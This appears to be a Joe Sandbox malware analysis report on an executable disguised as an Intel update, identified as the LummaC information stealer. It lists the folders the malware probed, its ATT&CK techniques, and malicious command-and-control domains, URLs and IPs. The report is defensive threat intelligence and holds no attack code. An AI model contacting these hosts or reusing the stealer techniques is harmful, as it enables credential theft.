Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com	Directory queried: C:\Users\user\Documents\GRXZDKKVDB	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com	Directory queried: C:\Users\user\Documents\GRXZDKKVDB	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com	Directory queried: C:\Users\user\Documents\EFOYFBOLXA	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com	Directory queried: C:\Users\user\Documents\EFOYFBOLXA	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com	Directory queried: C:\Users\user\Documents\EIVQSAOTAQ	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com	Directory queried: C:\Users\user\Documents\EIVQSAOTAQ	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com	Directory queried: C:\Users\user\Documents\GIGIYTFFYT	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com	Directory queried: C:\Users\user\Documents\GIGIYTFFYT	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com	Directory queried: C:\Users\user\Documents\SUAVTZKNFL	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com	Directory queried: C:\Users\user\Documents\SUAVTZKNFL	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com	Directory queried: C:\Users\user\Documents\EFOYFBOLXA	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com	Directory queried: C:\Users\user\Documents\EFOYFBOLXA	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com	Directory queried: C:\Users\user\Documents\GIGIYTFFYT	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com	Directory queried: C:\Users\user\Documents\GIGIYTFFYT	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com	Directory queried: C:\Users\user\Documents\GRXZDKKVDB	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com	Directory queried: C:\Users\user\Documents\GRXZDKKVDB	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com	Directory queried: C:\Users\user\Documents\PIVFAGEAAV	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com	Directory queried: C:\Users\user\Documents\PIVFAGEAAV	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com	Directory queried: C:\Users\user\Documents\SUAVTZKNFL	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com	Directory queried: C:\Users\user\Documents\SUAVTZKNFL	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com	Directory queried: C:\Users\user\Documents\EFOYFBOLXA	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com	Directory queried: C:\Users\user\Documents\EFOYFBOLXA	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com	Directory queried: C:\Users\user\Documents\EIVQSAOTAQ	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com	Directory queried: C:\Users\user\Documents\EIVQSAOTAQ	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com	Directory queried: C:\Users\user\Documents\SUAVTZKNFL	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com	Directory queried: C:\Users\user\Documents\SUAVTZKNFL	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com	Directory queried: C:\Users\user\Documents\EFOYFBOLXA	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com	Directory queried: C:\Users\user\Documents\EFOYFBOLXA	Jump to behavior

Source: Yara match	File source: 0000000D.00000003.2716593365.0000000001B41000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000003.2717609537.0000000001B41000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Hugo.com PID: 6596, type: MEMORYSTR

Remote Access Functionality

Yara detected LummaC Stealer

Source: Yara match	File source: Process Memory Space: Hugo.com PID: 6596, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com	Code function: 13_2_00F92263 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,		13_2_00F92263
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com	Code function: 13_2_00F91C61 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,		13_2_00F91C61

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	2 Valid Accounts	121 Windows Management Instrumentation	1 DLL Side-Loading	1 Exploitation for Privilege Escalation	1 Disable or Modify Tools	2 OS Credential Dumping	2 System Time Discovery	Remote Services	1 Archive Collected Data	2 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	1 Native API	2 Valid Accounts	1 DLL Side-Loading	11 Deobfuscate/Decode Files or Information	21 Input Capture	1 Account Discovery	Remote Desktop Protocol	41 Data from Local System	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 PowerShell	Logon Script (Windows)	2 Valid Accounts	2 Obfuscated Files or Information	Security Account Manager	13 File and Directory Discovery	SMB/Windows Admin Shares	21 Input Capture	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	21 Access Token Manipulation	1 DLL Side-Loading	NTDS	37 System Information Discovery	Distributed Component Object Model	3 Clipboard Data	114 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	12 Process Injection	111 Masquerading	LSA Secrets	341 Security Software Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	2 Valid Accounts	Cached Domain Credentials	31 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	31 Virtualization/Sandbox Evasion	DCSync	4 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	21 Access Token Manipulation	Proc Filesystem	1 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	12 Process Injection	/etc/passwd and /etc/shadow	1 System Owner/User Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
[UPD]Intel_Unit.2.1.exe	5%	ReversingLabs

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com	0%	ReversingLabs

Unpacked PE Files

⊘No Antivirus matches

Domains

Source	Detection	Scanner	Label
noisycuttej.shop	100%	URL Reputation	malware
framekgirus.shop	100%	URL Reputation	malware
rabidcowse.shop	100%	URL Reputation	malware
wholersorie.shop	100%	URL Reputation	malware
tirepublicerj.shop	100%	URL Reputation	malware

URLs

Source	Detection	Scanner	Label
https://sputnik-1985.com/i~	100%	Avira URL Cloud	malware
https://sputnik-1985.com/api	100%	Avira URL Cloud	malware
https://sputnik-1985.com/LOX	100%	Avira URL Cloud	malware
https://sputnik-1985.com/r	100%	Avira URL Cloud	malware
https://sputnik-1985.com:443/apial	100%	Avira URL Cloud	malware
https://sputnik-1985.com/Site	100%	Avira URL Cloud	malware
https://sputnik-1985.com/t	100%	Avira URL Cloud	malware
lastlossunbag.click	100%	Avira URL Cloud	malware
https://sputnik-1985.com/api0	100%	Avira URL Cloud	malware
https://community.fastl	0%	Avira URL Cloud	safe
https://sputnik-1985.com/apila	100%	Avira URL Cloud	malware
https://sputnik-1985.com/apij	100%	Avira URL Cloud	malware
https://sputnik-1985.com/apijhhCf	100%	Avira URL Cloud	malware
https://lastlossunbag.click/api	100%	Avira URL Cloud	malware
https://sputnik-1985.com/	100%	Avira URL Cloud	malware
https://sputnik-1985.com/a	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
steamcommunity.com	104.102.49.254	true	false		high
s-part-0017.t-0009.t-msedge.net	13.107.246.45	true	false		high
sputnik-1985.com	104.21.64.1	true	false		high
lastlossunbag.click	unknown	unknown	true		unknown
cloudewahsj.shop	unknown	unknown	false		high
noisycuttej.shop	unknown	unknown	true	100%, URL Reputation	unknown
nearycrepso.shop	unknown	unknown	false		high
framekgirus.shop	unknown	unknown	true	100%, URL Reputation	unknown
rabidcowse.shop	unknown	unknown	true	100%, URL Reputation	unknown
wholersorie.shop	unknown	unknown	true	100%, URL Reputation	unknown
tirepublicerj.shop	unknown	unknown	true	100%, URL Reputation	unknown
EDfttWxgFMWaHfidSCzybfKyg.EDfttWxgFMWaHfidSCzybfKyg	unknown	unknown	true		unknown
abruptyopsn.shop	unknown	unknown	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
lastlossunbag.click	true	Avira URL Cloud: malware	unknown
https://sputnik-1985.com/api	true	Avira URL Cloud: malware	unknown
https://steamcommunity.com/profiles/76561199724331900	false		high
rabidcowse.shop	false		high
wholersorie.shop	false		high
cloudewahsj.shop	false		high
noisycuttej.shop	false		high
nearycrepso.shop	false		high
framekgirus.shop	false		high
tirepublicerj.shop	false		high
abruptyopsn.shop	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://steamcommunity.com/my/wishlist/	Hugo.com, 0000000D.00000002.2765676782.0000000001AE1000.00000004.00000020.00020000.00000000.sdmp	false		high
https://duckduckgo.com/chrome_newtab	Hugo.com, 0000000D.00000003.2694559579.0000000004A00000.00000004.00000800.00020000.00000000.sdmp, Hugo.com, 0000000D.00000003.2694632546.00000000049E9000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/ac/?q=	Hugo.com, 0000000D.00000003.2694559579.0000000004A00000.00000004.00000800.00020000.00000000.sdmp, Hugo.com, 0000000D.00000003.2694632546.00000000049E9000.00000004.00000800.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/shared/css/shared_responsive.css?v=JL1e4uQSrVGe&	Hugo.com, 0000000D.00000002.2765676782.0000000001AE1000.00000004.00000020.00020000.00000000.sdmp	false		high
http://ocsp.entrust.net03	[UPD]Intel_Unit.2.1.exe	false		high
https://steamcommunity.com/?subsection=broadcasts	Hugo.com, 0000000D.00000002.2765676782.0000000001AE1000.00000004.00000020.00020000.00000000.sdmp	false		high
http://ocsp.entrust.net02	[UPD]Intel_Unit.2.1.exe	false		high
https://help.steampowered.com/en/	Hugo.com, 0000000D.00000002.2765676782.0000000001AE1000.00000004.00000020.00020000.00000000.sdmp	false		high
https://steamcommunity.com/market/	Hugo.com, 0000000D.00000002.2765676782.0000000001AE1000.00000004.00000020.00020000.00000000.sdmp	false		high
https://store.steampowered.com/news/	Hugo.com, 0000000D.00000002.2765676782.0000000001AE1000.00000004.00000020.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	Hugo.com, 0000000D.00000003.2694559579.0000000004A00000.00000004.00000800.00020000.00000000.sdmp, Hugo.com, 0000000D.00000003.2694632546.00000000049E9000.00000004.00000800.00020000.00000000.sdmp	false		high
http://store.steampowered.com/subscriber_agreement/	Hugo.com, 0000000D.00000003.2695052302.0000000001B37000.00000004.00000020.00020000.00000000.sdmp	false		high
https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org	Hugo.com, 0000000D.00000003.2695052302.0000000001B37000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.autoitscript.com/autoit3/	Hugo.com, 0000000D.00000003.2657829422.0000000004D4A000.00000004.00000800.00020000.00000000.sdmp, Hence.9.dr, Hugo.com.2.dr	false		high
https://sputnik-1985.com/r	Hugo.com, 0000000D.00000002.2765676782.0000000001B41000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://sputnik-1985.com/t	Hugo.com, 0000000D.00000003.2716593365.0000000001B41000.00000004.00000020.00020000.00000000.sdmp, Hugo.com, 0000000D.00000003.2717609537.0000000001B41000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://steamcommunity.com/discussions/	Hugo.com, 0000000D.00000002.2765676782.0000000001AE1000.00000004.00000020.00020000.00000000.sdmp	false		high
https://sputnik-1985.com/api0	Hugo.com, 0000000D.00000002.2765946345.00000000048E9000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://store.steampowered.com/stats/	Hugo.com, 0000000D.00000002.2765676782.0000000001AE1000.00000004.00000020.00020000.00000000.sdmp	false		high
https://sputnik-1985.com:443/apial	Hugo.com, 0000000D.00000002.2765602935.0000000001A6A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://community.fastly.steamstatic.com/public/shared/javascript/shared_global.js?v=Gr6TbGRvDtNE&am	Hugo.com, 0000000D.00000002.2765676782.0000000001AE1000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/css/skin_1/header.css?v=EM4kCu67DNda&l=english&a	Hugo.com, 0000000D.00000002.2765676782.0000000001AE1000.00000004.00000020.00020000.00000000.sdmp	false		high
http://x1.c.lencr.org/0	Hugo.com, 0000000D.00000003.2716136407.00000000049F9000.00000004.00000800.00020000.00000000.sdmp	false		high
http://x1.i.lencr.org/0	Hugo.com, 0000000D.00000003.2716136407.00000000049F9000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	Hugo.com, 0000000D.00000003.2694559579.0000000004A00000.00000004.00000800.00020000.00000000.sdmp, Hugo.com, 0000000D.00000003.2694632546.00000000049E9000.00000004.00000800.00020000.00000000.sdmp	false		high
https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900	Hugo.com, 0000000D.00000002.2765676782.0000000001AE1000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/javascript/reportedcontent.js?v=-lZqrarogJr8&l=e	Hugo.com, 0000000D.00000002.2765676782.0000000001AE1000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcDIgbC	Hugo.com, 0000000D.00000002.2765676782.0000000001AE1000.00000004.00000020.00020000.00000000.sdmp	false		high
http://crl.entrust.net/ts1ca.crl0	[UPD]Intel_Unit.2.1.exe	false		high
https://sputnik-1985.com/Site	Hugo.com, 0000000D.00000002.2765676782.0000000001B41000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://steamcommunity.com/workshop/	Hugo.com, 0000000D.00000002.2765676782.0000000001AE1000.00000004.00000020.00020000.00000000.sdmp	false		high
https://support.mozilla.org/products/firefoxgro.all	Hugo.com, 0000000D.00000003.2717261373.0000000005A0D000.00000004.00000800.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1	Hugo.com, 0000000D.00000003.2695052302.0000000001B37000.00000004.00000020.00020000.00000000.sdmp	false		high
https://store.steampowered.com/legal/	Hugo.com, 0000000D.00000003.2695052302.0000000001B37000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastl	Hugo.com, 0000000D.00000002.2765676782.0000000001AE1000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.mozilla.or	Hugo.com, 0000000D.00000003.2717558680.00000000049F5000.00000004.00000800.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/shared/javascript/tooltip.js?v=QYkT4eS5mbTN&l=en	Hugo.com, 0000000D.00000002.2765676782.0000000001AE1000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/javascript/prototype-1.7.js?v=npJElBnrEO6W&l=eng	Hugo.com, 0000000D.00000002.2765676782.0000000001AE1000.00000004.00000020.00020000.00000000.sdmp	false		high
https://sputnik-1985.com/LOX	Hugo.com, 0000000D.00000002.2765676782.0000000001B41000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://community.fastly.steamstatic.com/public/javascript/promo/stickers.js?v=CcLRHsa04otQ&l=en	Hugo.com, 0000000D.00000002.2765676782.0000000001AE1000.00000004.00000020.00020000.00000000.sdmp	false		high
https://sputnik-1985.com/i~	Hugo.com, 0000000D.00000002.2765479156.0000000001A35000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	Hugo.com, 0000000D.00000003.2694559579.0000000004A00000.00000004.00000800.00020000.00000000.sdmp, Hugo.com, 0000000D.00000003.2694632546.00000000049E9000.00000004.00000800.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/javascript/profile.js?v=GeQ6v03mWpAc&l=english&a	Hugo.com, 0000000D.00000002.2765676782.0000000001AE1000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.entrust.net/rpa03	[UPD]Intel_Unit.2.1.exe	false		high
https://community.fastly.steamstatic.com/public/javascript/modalContent.js?v=uqf5ttWTRe7l&l=engl	Hugo.com, 0000000D.00000002.2765676782.0000000001AE1000.00000004.00000020.00020000.00000000.sdmp	false		high
http://store.steampowered.com/privacy_agreement/	Hugo.com, 0000000D.00000003.2695052302.0000000001B37000.00000004.00000020.00020000.00000000.sdmp	false		high
https://store.steampowered.com/points/shop/	Hugo.com, 0000000D.00000002.2765676782.0000000001AE1000.00000004.00000020.00020000.00000000.sdmp	false		high
http://aia.entrust.net/ts1-chain256.cer01	[UPD]Intel_Unit.2.1.exe	false		high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	Hugo.com, 0000000D.00000003.2694559579.0000000004A00000.00000004.00000800.00020000.00000000.sdmp, Hugo.com, 0000000D.00000003.2694632546.00000000049E9000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.rootca1.amazontrust.com/rootca1.crl0	Hugo.com, 0000000D.00000003.2716136407.00000000049F9000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.autoitscript.com/autoit3/X	Hugo.com, 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmp, Hugo.com, 0000000D.00000003.2657829422.0000000004D4A000.00000004.00000800.00020000.00000000.sdmp, Enlarge.9.dr, Hugo.com.2.dr	false		high
https://sputnik-1985.com/apila	Hugo.com, 0000000D.00000002.2765676782.0000000001B41000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://store.steampowered.com/	Hugo.com, 0000000D.00000002.2765676782.0000000001AE1000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/javascript/webui/clientcom.js?v=oOCAGrkRfpQ6&l=e	Hugo.com, 0000000D.00000002.2765676782.0000000001AE1000.00000004.00000020.00020000.00000000.sdmp	false		high
http://ocsp.rootca1.amazontrust.com0:	Hugo.com, 0000000D.00000003.2716136407.00000000049F9000.00000004.00000800.00020000.00000000.sdmp	false		high
http://nsis.sf.net/NSIS_ErrorError	[UPD]Intel_Unit.2.1.exe	false		high
https://community.fastly.steamstatic.com/public/javascript/modalv2.js?v=zBXEuexVQ0FZ&l=english&a	Hugo.com, 0000000D.00000002.2765676782.0000000001AE1000.00000004.00000020.00020000.00000000.sdmp	false		high
https://sputnik-1985.com/apij	Hugo.com, 0000000D.00000002.2765627357.0000000001A81000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://www.ecosia.org/newtab/	Hugo.com, 0000000D.00000003.2694559579.0000000004A00000.00000004.00000800.00020000.00000000.sdmp, Hugo.com, 0000000D.00000003.2694632546.00000000049E9000.00000004.00000800.00020000.00000000.sdmp	false		high
https://steamcommunity.com/profiles/76561199724331900/inventory/	Hugo.com, 0000000D.00000003.2695052302.0000000001B37000.00000004.00000020.00020000.00000000.sdmp	false		high
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	Hugo.com, 0000000D.00000003.2717261373.0000000005A0D000.00000004.00000800.00020000.00000000.sdmp	false		high
https://avatars.fastly.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg	Hugo.com, 0000000D.00000002.2765676782.0000000001AE1000.00000004.00000020.00020000.00000000.sdmp	false		high
https://lastlossunbag.click/api	Hugo.com, 0000000D.00000002.2765602935.0000000001A6A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://sputnik-1985.com/	Hugo.com, 0000000D.00000002.2765676782.0000000001B41000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://ac.ecosia.org/autocomplete?q=	Hugo.com, 0000000D.00000003.2694559579.0000000004A00000.00000004.00000800.00020000.00000000.sdmp, Hugo.com, 0000000D.00000003.2694632546.00000000049E9000.00000004.00000800.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=tvQ	Hugo.com, 0000000D.00000002.2765676782.0000000001AE1000.00000004.00000020.00020000.00000000.sdmp	false		high
https://sputnik-1985.com/a	Hugo.com, 0000000D.00000003.2717609537.0000000001B35000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://community.fastly.steamstatic.com/public/javascript/global.js?v=jWc2JLWHx5Kn&l=english&am	Hugo.com, 0000000D.00000002.2765676782.0000000001AE1000.00000004.00000020.00020000.00000000.sdmp	false		high
http://crt.rootca1.amazontrust.com/rootca1.cer0?	Hugo.com, 0000000D.00000003.2716136407.00000000049F9000.00000004.00000800.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/shared/javascript/auth_refresh.js?v=w6QbwI-5-j2S&amp	Hugo.com, 0000000D.00000002.2765676782.0000000001AE1000.00000004.00000020.00020000.00000000.sdmp	false		high
https://sputnik-1985.com/apijhhCf	Hugo.com, 0000000D.00000002.2765676782.0000000001B41000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://steamcommunity.com/profiles/7656119972433190	Hugo.com, 0000000D.00000002.2765946345.0000000004880000.00000004.00000800.00020000.00000000.sdmp	false		high
http://store.steampowered.com/account/cookiepreferences/	Hugo.com, 0000000D.00000003.2695052302.0000000001B37000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly	Hugo.com, 0000000D.00000002.2765676782.0000000001AE1000.00000004.00000020.00020000.00000000.sdmp	false		high
https://steamcommunity.com/	Hugo.com, 0000000D.00000002.2765676782.0000000001AE1000.00000004.00000020.00020000.00000000.sdmp	false		high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	Hugo.com, 0000000D.00000003.2694559579.0000000004A00000.00000004.00000800.00020000.00000000.sdmp, Hugo.com, 0000000D.00000003.2694632546.00000000049E9000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.entrust.net/2048ca.crl0	[UPD]Intel_Unit.2.1.exe	false		high
https://community.fastly.steamstatic.com/public/javascript/applications/community/main.js?v=_92TWn81	Hugo.com, 0000000D.00000002.2765946345.0000000004880000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.entrust.net/rpa0	[UPD]Intel_Unit.2.1.exe	false		high
https://store.steampowered.com/about/	Hugo.com, 0000000D.00000002.2765676782.0000000001AE1000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=gQHVlrK4-jX-&l	Hugo.com, 0000000D.00000002.2765676782.0000000001AE1000.00000004.00000020.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
104.102.49.254	steamcommunity.com	United States		16625	AKAMAI-ASUS	false
104.21.64.1	sputnik-1985.com	United States		13335	CLOUDFLARENETUS	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1585387
Start date and time:	2025-01-07 15:44:08 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 6m 28s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	19
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	[UPD]Intel_Unit.2.1.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@26/21@12/2
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 100% Number of executed functions: 84 Number of non-executed functions: 292
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
Excluded IPs from analysis (whitelisted): 13.107.246.45, 4.245.163.56, 20.12.23.50
Excluded domains from analysis (whitelisted): d.8.0.a.e.e.f.b.0.0.0.0.0.0.0.0.5.0.0.0.0.0.8.0.0.3.0.1.3.0.6.2.ip6.arpa, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, otelrules.afd.azureedge.net, ctldl.windowsupdate.com, azureedge-t-prod.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtSetInformationFile calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: [UPD]Intel_Unit.2.1.exe

Simulations

Behavior and APIs

Time	Type	Description
09:45:13	API Interceptor	1x Sleep call for process: [UPD]Intel_Unit.2.1.exe modified
09:45:54	API Interceptor	8x Sleep call for process: Hugo.com modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
104.102.49.254	r4xiHKy8aM.exe	Get hash	malicious	Socks5Systemz	Browse	/ISteamUser/GetFriendList/v1/?key=AE2AE4DBF33A541E83BC08989DB1F397&steamid=76561198400860497
104.102.49.254	http://gtm-cn-j4g3qqvf603.steamproxy1.com/	Get hash	malicious	Unknown	Browse	www.valvesoftware.com/legal.htm
104.21.64.1	Sales Acknowledgement - HES #982323.pdf	Get hash	malicious	Unknown	Browse	ordrr.statementquo.com/QCbxA/
	SH8ZyOWNi2.exe	Get hash	malicious	CMSBrute	Browse	adsfirm.com/administrator/index.php
	PO2412010.exe	Get hash	malicious	FormBook	Browse	www.bser101pp.buzz/v89f/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
